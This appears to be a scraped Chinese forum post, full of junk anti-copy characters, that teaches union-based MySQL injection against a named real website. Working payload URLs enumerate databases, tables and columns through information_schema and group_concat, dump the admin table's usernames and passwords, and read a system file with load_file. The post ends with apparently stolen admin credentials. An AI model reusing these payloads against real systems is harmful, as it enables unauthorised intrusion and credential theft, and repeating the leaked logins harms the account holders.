此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
$ b+ P4 C1 `! z& b8 p但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人3 G( I* g, _' t% _$ ^
9 ]5 ~5 h) f. T( f) a, v8 x2 `! Y9 K- H7 P8 @. g4 k8 k7 l+ s3 y
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入3 o3 A6 V% _8 f( `' ~8 N
) Q3 P$ Y7 R9 _+ m缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
! \! F+ C6 E9 v t& w0 m
* L# _5 L0 d' N7 R下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示; b9 R+ J' S0 T& s' e1 f
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
* F3 _5 O. Z; h' j" ]) q/ }! _
0 S* P9 k, }8 Ehttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,170 P, }- t% V. _1 b
% O' n Y& L& q' e! h, C6 x读出所有库:
9 T7 ?4 h: ]9 j, O9 o9 N: ahttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA7 O6 O) J& a9 M' G8 P6 M
7 J5 r, V9 |- e. g$ s
4 B% _! f5 U2 H+ _# r q
4 g. F. \" u4 j( u% m
读出所有表:
0 v9 J V3 s4 @8 Nhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
0 q+ M, R: N$ }8 L4 j8 Q/ X3 ~% t9 {
读出所有表字段:
' y8 C, b& J/ c/ n. Mhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
# G0 y1 b9 g, U( f. d*/ (97,100,109,105,110)为admin的ascii码 依次类推6 W' c! v2 h, f7 D
- d1 l* n* K: }! A读出所有表字段里的内容:( ^' B9 ?3 w9 j7 Y( T
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin) u: T9 g( [$ Z8 ^. W
5 b. R) S* n. q( g" Z+ A: p1 O* M5 @6 w
* \5 n, J& }% i
" D! q+ J: R' U4 d8 t) z0 G
' \' A" [7 r6 z: o! h+ U
! W a1 r* z" I5 j! Lhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
$ }% W7 j1 I# x1 W* R2 Q* ~( y
/ K8 r2 e% x; U, i+ e/ c; u
2 W1 ]+ u0 m. a" S$ i" chttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23( e% I0 q3 t/ w) }
; @; ?( C! a" J8 ?- w! [( _: Bhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
R, }$ b$ L) {+ m9 ?5 M& z$ Z" g( d" a
6 h1 \' D0 p) q6 t3 f' P6 ^# J1 L
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23* K8 D: k+ M5 ]3 R2 f( p# H" a
6 Z4 p! o7 L, ]% l6 p* H# M; E2 D" y
webmaster:dzb521123,simlab:simadmin20043233; _1 {7 E" h6 e) [/ q
|